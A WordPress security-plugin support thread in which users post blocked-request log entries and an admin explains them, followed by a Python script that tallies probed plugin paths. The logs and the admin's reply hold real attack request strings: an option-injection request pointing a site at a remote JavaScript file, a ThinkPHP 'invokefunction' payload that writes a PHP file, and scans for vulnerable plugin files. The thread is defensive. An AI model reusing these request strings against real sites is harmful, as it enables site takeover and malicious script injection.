Security Log Event Codes


Viewing 7 posts - 76 through 82 (of 82 total)

    #35544
    Bub
    Participant

    Done and done…. Thanks. This topic should now be closed.

    #35545
    Bub
    Participant

    Again, thanks.

    #37723
    sergeykar
    Participant

    I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing its job – however is there a weakness this attempt is trying to exploit?

    [403 GET Request: 06.08.2019 - 10:15]
    BPS: 3.5
    WP: 5.2.2
    Event Code: WPADMIN-SBR
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: 159.69.154.78
    Host Name: static.78.154.69.159.clients.your-server.de
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36

    #37724
    AITpro Admin
    Keymaster

    This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code.  To check if your website is hacked do the steps below:

    1. Go to your website’s home page.
    2. Right mouse click and click View page source (Google Chrome) or a similar command for other Browsers.
    3. Use your Browser’s Find… command (Google Chrome – located under settings > Find…) and enter this search string: nd_options
    4. If you see/find Source Code that looks like this below then your website is hacked.
    5. Let me know if your Browser Find/Search finds any search results or not.

    httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],

    #39337
    Chris Moon
    Participant

    Found this in my Security Log and not sure what it means:

    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla
    
    [403 GET Request: September 19, 2020 - 23:57]
    BPS Pro: 14.8
    WP: 5.5.1
    Event Code: PFWR-PSBR-HPRA
    Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
    REMOTE_ADDR: GDPR Compliance On
    Host Name: ns4.transcomag.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP: GDPR Compliance On
    HTTP_FORWARDED: GDPR Compliance On
    HTTP_X_FORWARDED_FOR: GDPR Compliance On
    HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla

    #39338
    AITpro Admin
    Keymaster

    @ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities.  The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder.  So these recons/searches were blocked by the BPS Pro Plugin Firewall.
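
Added example (not part of the original posts and not BPS code): a Python script that parses Security Log entries in the layout posted above and counts blocked plugin-path requests per plugin folder, marking whether that plugin is actually installed on the site. The sample log, the host name `scanner.example.net` and the `installed` inventory are constructed assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the entry layout shown in the posts above (not a real log).
SAMPLE_LOG = """\
[403 GET Request: September 19, 2020 - 23:57]
Event Code: PFWR-PSBR-HPRA
Host Name: scanner.example.net
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php

[403 GET Request: September 19, 2020 - 23:57]
Event Code: PFWR-PSBR-HPRA
Host Name: scanner.example.net
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php

[403 GET Request: September 19, 2020 - 23:58]
Event Code: PFWR-PSBR-HPRA
Host Name: scanner.example.net
REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js
"""

HEADER = re.compile(r"^\[(\d{3}) (\w+) Request: (.+)\]$")
PLUGIN = re.compile(r"^/wp-content/plugins/([^/?]+)/")

def parse_entries(text):
    """Split the log into dicts; a '[403 GET Request: ...]' line starts an entry."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        m = HEADER.match(line)
        if m:
            entries.append({"status": m.group(1), "method": m.group(2), "time": m.group(3)})
        elif entries and ":" in line:
            key, _, value = line.partition(":")  # split on the first colon only
            entries[-1][key.strip()] = value.strip()
    return entries

def probed_plugins(entries, installed):
    """Count 403 plugin-path requests per slug; `installed` is an assumed set of plugin folder names."""
    report = defaultdict(lambda: {"hits": 0, "installed": False})
    for e in entries:
        m = PLUGIN.match(e.get("REQUEST_URI", ""))
        if m and e["status"] == "403":
            slug = m.group(1)
            report[slug]["hits"] += 1
            report[slug]["installed"] = slug in installed
    return dict(report)

if __name__ == "__main__":
    print(probed_plugins(parse_entries(SAMPLE_LOG), installed={"quiz-master-next"}))
```

A slug reported with `installed: True` is the one to check for pending updates first; slugs that are not installed are blind scans.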

    #39340
    Chris Moon
    Participant

    Thanks Ed, that’s reassuring.
